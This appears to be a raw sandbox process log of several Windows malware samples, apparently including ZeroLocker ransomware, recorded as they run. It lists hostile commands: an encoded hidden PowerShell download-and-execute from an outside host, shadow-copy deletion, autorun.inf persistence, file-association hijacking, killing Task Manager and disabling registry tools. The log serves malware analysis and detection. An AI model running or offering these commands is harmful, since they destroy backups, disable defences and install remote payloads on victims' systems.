C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe

"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5012,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6404 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\" -ad -an -ai#7zMap21626:190:7zEvent4642

C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe

"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2De1W6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://iplogger.com/2De1W6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7356,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=7468,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=2924,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\" -ad -an -ai#7zMap12901:190:7zEvent28505

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\" -ad -an -ai#7zMap29832:190:7zEvent3947

C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe

"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ZeroLocker\ZeroRescue.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5708,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap6371:190:7zEvent12940

C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe

"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C echo ^[autorun^] >autorun.inf

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C echo ^open^=KasperskyScan^.exe >>autorun.inf

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=6624,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7544,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap25546:190:7zEvent32505

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap14106:190:7zEvent8523

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\" -ad -an -ai#7zMap16342:190:7zEvent8403

C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe

"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start %temp%\tmp1.jpg

C:\Users\Admin\AppData\Local\Temp\tmp1.jpg

C:\Users\Admin\AppData\Local\Temp\tmp1.jpg

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start %temp%\tmp2.exe

C:\Users\Admin\AppData\Local\Temp\tmp2.exe

C:\Users\Admin\AppData\Local\Temp\tmp2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C taskkill /im taskmgr.exe /f

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /im taskmgr.exe /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /1

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .png=NotSoCleverBotFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .vbs=NotSoCleverBotFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .html=NotSoCleverBotFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .bat=NotSoCleverBotFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .jpn=EncryptedFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .js=exe1file

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

